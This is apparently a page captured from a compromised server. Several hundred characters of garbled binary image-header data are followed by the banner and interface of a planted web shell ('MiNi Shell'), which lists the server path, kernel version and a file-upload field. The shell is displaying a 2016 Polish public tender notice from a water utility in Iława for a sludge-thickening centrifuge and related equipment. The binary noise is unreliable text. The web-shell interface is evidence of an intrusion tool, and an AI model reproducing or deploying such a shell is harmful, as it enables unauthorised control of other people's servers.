JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/16756-N-2016.html

<p class="kh_header"><b>Iława: Gospodarka osadowa - modernizacja stacji zagęszczenia osadów przez zakup urządzenia do zagęszczania osadów</b><br>
<b>Numer ogłoszenia: 16756 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Iławskie Wodociągi Sp. z o.o. , ul. Wodna 2, 14-202 Iława, woj. warmińsko-mazurskie, tel. 089 6485123, faks 089 6485123.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ilawskiewodociagi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Gospodarka osadowa - modernizacja stacji zagęszczenia osadów przez zakup urządzenia do zagęszczania osadów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa fabrycznie nowej wirówki  o parametrach określonych przez Zamawiającego.
2.	Szczegółowy opis przedmiotu zamówienia:
1		Dane technologiczne:
a	uwodnienie osadu na wejściu - 1,5- 2,5 % s.m.;
b	rodzaj osadu:
- osad nadmierny biologiczny
- osad surowy po osadnikach wstępnych
- osad po zagęszczeniu podawany będzie do zamkniętych komór fermentacyjnych;
c	s.m. organiczna osadów ok.  70-80%;
d	zagęszczenie osadów po wirówce ok 6,5- 7,5%
2	Wirówka szt. 1
a	wyposażona w 2 - przekładniowy system napędu. Automatyczna regulacja różnicy obrotów.  Parametry techniczne:
-wydajność - 10-15 m3/h
-obroty bębna - max 3200 obr/min
-średnica bębna min 340 mm
-wnętrze bębna wyposażone w rowki do transportu osadu (nie dopuszcza się zastosowania listew przykręcanych)
-współczynnik l/d -nie większy niż 4
-silnik główny - moc znamionowa nie większa niż 18 kw rozruch przy pomocy falownika
-silnik pomocniczy moc znamionowa nie większa niż 2,2 kw rozruch przez falownik
-czujnik wibracji
-czujnik temperatury łożysk głównych
-automatyczne smarowanie łożysk
-części stykające się z osadem wykonane ze stali szlachetnej o podwyższonej jakości
-wirówka wyposażona w zasuwę pneumatyczną na szybie osadu zagęszczonego wraz z kompresorem oraz zbiornikiem osadu zagęszczonego
-szyb odcieku wykonany ze stali nierdzewnej z zaworem do poboru próbek i przyłączem do odpowietrzenia
-zbiornik osadu zagęszczonego wykonany ze stali nierdzewnej (gwarantującej odporność na działanie środowiska agresywnego), wyposażony w czujniki poziomu, wyłączniki krańcowe 
-konstrukcja zbiornika osadu zagęszczonego umożliwi odbiór osadu zagęszczonego przez dwie pompy w tym samym czasie lub zamiennie
-kompaktowa szafa sterownicza z falownikami dla pomp zlokalizowana będzie w pomieszczeniu dyspozytorni 
-zadania szafy: sterowanie pracą wirówki  z pamięcią danych na karcie mikroprocesowej
Zakres sterowania:
- rozruch silnika głównego
- rozruch silnika pomocniczego
- pomiar prędkości wirówki
- rozruch pompy osadu zagęszczonego
- przetwarzanie natężenia przepływu osadu na nadawie 
- pomiar gęstości osadu po wirówce
-lokalny panel sterowniczy przy wirówce umożliwiający wykonanie podstawowych czynności związanych z jej pracą umieszczony w skrzynce odpornej na działanie czynników agresywnych
-wizualizacja pracy wirówki oraz pomiarów  na monitorze w pomieszczeniu dyspozytorni
-zestaw narzędzi serwisowych do wirówki
-sonda pomiaru gęstości osadu po zagęszczeniu szt. 2 - optyczny czujnik mętności wyposażony w armaturę z zaworem kulowym umożliwiającym czyszczenie lub wymianę czujnika podczas pracy
-demontażu starej stacji zagęszczania osadu dokona zamawiający
-montażu nowej wirówki oraz związanych z nią elementów dokona zamawiający na podstawie projektu technicznego wykonanego przez dostawcę urządzeń, uzgodnionego oraz zatwierdzonego przez zamawiającego
3 Stacja przygotowania polielektrolitu szt. 1
a	Parametry techniczne:
-wydajność - 1000 l/h
-stężenie roztworu - 0,05-0,5 %
-zbiornik 3- komorowy
-zbiornik wykonany z tworzywa sztucznego odpornego na działanie środków chemicznych i promieniowania UV
-mieszadła we wszystkich komorach - 3 szt.
-analogowy ciągły pomiar poziomu
-przepływomierz impulsowy
-zasobnik proszku z ogrzewaniem i ślimakiem
-system automatycznego poboru  proszku
-stacja powinna być przygotowana do pracy z polielektrolitem proszkowym i emulsją
-zawory spustowe komór, króciec przelewu awaryjnego i zawór roztworu zgrupowane na jednym boku stacji
-szafa sterownicza wykonana ze stali nierdzewnej odporna na działanie czynników agresywnych, dotykowy panel sterowniczy z wizualizacją pracy stacji
-możliwość kalibracji objętościowej i wagowej
4 Pompa śrubowa roztworu elektrolitu szt. 1
a	wydajność regulowana w zakresie 75-700 l/h przy obrotach 60-300 obr/min;
b	wysokość tłoczenia 2 bar;
c	napęd pompy przystosowany do pracy z falownikiem;
d	zabezpieczenie przed suchobiegiem;
e	zabezpieczenie termiczne;
5	Pompa śrubowa osadu zagęszczonego szt. 2
a	wydajność regulowana  w zakresie 4-9 m3/h przy obrotach 41-95 obr/min;
b	wysokość tłoczenia 2-4 bar;
c	korpus pompy wyposażony w otwór inspekcyjny;
d	zabezpieczenie przed suchobiegiem;
e	zabezpieczenie termiczne;
f	pompa w wykonaniu monoblokowym;
g	rotor wykonany z pełnego materiału, stal chromowana hartowana powierzchniowo;
h	napęd przystosowany do pracy z falownikiem.
3.	Dokumentacja i rozruch
1)	Wykonawca dostarczy dokumentację dtr na wszystkie urządzenia w języku polskim.
2)	Wykonawca przeszkoli personel zamawiającego w zakresie obsługi i konserwacji urządzeń.
3)	W trakcie rozruchu wykonawca przeprowadzi na koszt własny testy i określi rodzaj polielektrolitu.
4)	Wykonawca przeprowadzi kalibrację stacji przygotowania polielektrolitu w celu uzyskania optymalnego efektu jej pracy. W przypadku nie osiągnięcia gwarantowanych parametrów (pkt. 2 ppkt 1) opisu przedmiotu zamówienia), Wykonawca nie otrzyma wynagrodzenia oraz będzie zmuszony do zabrania instalacji na swój koszt.
4.	Gwarancja 
1)	Wykonawca udzieli minimum 24 miesięcznej gwarancji jakości na wszystkie urządzenia od dnia odbioru końcowego. 
2)	W trakcie trwania okresu gwarancji wykonawca zobowiązany jest dostarczyć na swój koszt wszelkie części zamienne, części zużywające się i materiały związane z eksploatacją oraz przeglądami wynikającymi z zaleceń producenta na wszystkie urządzenia wymienione w opisie przedmiotu zamówienia.
3)	W trakcie trwania okresu gwarancji dokonywanie serwisu oraz terminowych przeglądów urządzeń odbywają się na koszt wykonawcy.
4)	W przypadku gdy wykonawca w trakcie trwania okresu gwarancyjnego dokona napraw lub wymiany wadliwych elementów urządzeń nie związanych z użyciem eksploatacyjnym będą one objęte 24 miesięcznym okresem gwarancji liczonym od daty ich wymiany.
5)	Dostawca zagwarantuje, że materiały z których zostaną wykonane elementy urządzeń wymienione w opisie przedmiotu zamówienia są odporne na działanie czynników wywołujących korozję.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.93.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 14 000,00 zł (Słownie: czternaście tysięcy złotych 00/100) w terminie do dnia 22.02.2016 r. do godziny 10.30.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnieniu warunku zgodnie ze wzorem. Ocena spełnienia warunku nastąpi na podstawie załączonego do oferty oświadczenia. Zamawiający nie wyznacza określonego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zgodnie ze wzorem wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, minimum trzech dostaw wirówek do zagęszczania osadów wraz z urządzeniami towarzyszącymi, w okresie trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane oraz załączenie dowodów, czy zostały wykonane należycie lub są wykonywane należycie;  
2.Oświadczenie o spełnieniu warunku zgodnie ze wzorem, że posiada wiedzę i doświadczenie do wykonania zamówienia. 
Ocena spełnienia warunku nastąpi na podstawie załączonego do oferty wypełnionego przez wykonawcę wzoru oraz złożonego oświadczenia o spełnieniu warunku zgodnie ze wzorem.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania do dyspozycji potencjału technicznego zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie ze wzorem, że dysponuje potencjałem technicznym potrzebnym do wykonania zamówienia. Ocena spełnienia warunku nastąpi na podstawie załączonego do oferty oświadczenia. Zamawiający nie wyznacza określonego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania do dyspozycji potencjału kadrowego zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie ze wzorem, że dysponuje potencjałem kadrowym potrzebnym do wykonania zamówienia. Ocena spełnienia warunku nastąpi na podstawie załączonego do oferty oświadczenia. Zamawiający nie wyznacza określonego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie ze wzorem, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Ocena spełnienia warunku nastąpi na podstawie załączonego do oferty oświadczenia. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Karty katalogowe zawierające zdjęcie, opis i rysunek oraz nazwę producenta, potwierdzające że zastosowane elementy są zgodne ze specyfikacją.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana   postanowień   umowy   może   nastąpić   za   zgodą   obydwu   stron   wyrażoną   na   piśmie, w formie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany.
2.	Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności zmiany terminu wykonania przedmiotu zamówienia, w szczególności:
1)	Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji przedmiotu umowy;
2)	Wstrzymania realizacji przedmiotu umowy przez zamawiającego;
3)	odmowy  wydania  przez  organy  administracji  lub  inne  podmioty  wymaganych  decyzji,  zezwoleń,  uzgodnień  z przyczyn niezawinionych przez wykonawcę;
4)	działania  siły  wyższej  (np. klęski  żywiołowe,  strajki  generalne  lub  lokalne),  mającej  bezpośredni  wpływ  na terminowość wykonywania przedmiotu umowy; 
5)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
6)	na  skutek  działań  osób  trzecich  lub  organów  władzy  publicznej,  które  spowodują  przerwanie  lub  czasowe  zawieszenie realizacji zamówienia;
7)	w przypadku konieczności wykonania dodatkowych badań i ekspertyz, analiz itp.
3.	Zakazuje się istotnych zmian postanowień zawartej umowy  w stosunku  do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:
1)	Wystąpienia  zmian  powszechnie  obowiązujących  przepisów  prawa  w zakresie  mającym  wpływ  na realizację  przedmiotu umowy;
2)	Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
3)	W  przypadku urzędowej zmiany stawki VAT strony zobowiązują się do zawarcia aneksu do umowy regulującego wysokość VAT, tym samym zmiany wynagrodzenia określonego;
4)	Zmiany osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy. 
5)	Wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy.
6)	Zmiany podwykonawców, pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż  wskazany  na  etapie  postępowania o  zamówienie  publiczne  dotychczasowy podwykonawca.
4.	W przypadkach wystąpienia okoliczności określonych w ust.2 pkt 1)-7) strony ustalą nowe terminy realizacji, z tym, że minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju.
5.	Niezależnie od powyższych zmian, zmiana umowy może być zawsze dokonana, jeżeli jest  ona  korzystna  dla  zamawiającego,  pod  warunkiem,  że  zmiana  ta  nie  prowadzi  do  zmiany  wysokości  wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ilawskiewodociagi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Iławskie Wodociągi Sp. z o.o.
ul. Wodna 2
14-202 Iława.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2016 godzina 10:30, miejsce: Iławskie Wodociągi Sp. z o.o.
ul. Wodna 2
14-202 Iława
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia może być dofinansowany z środków UE w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020, działanie 2.3.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com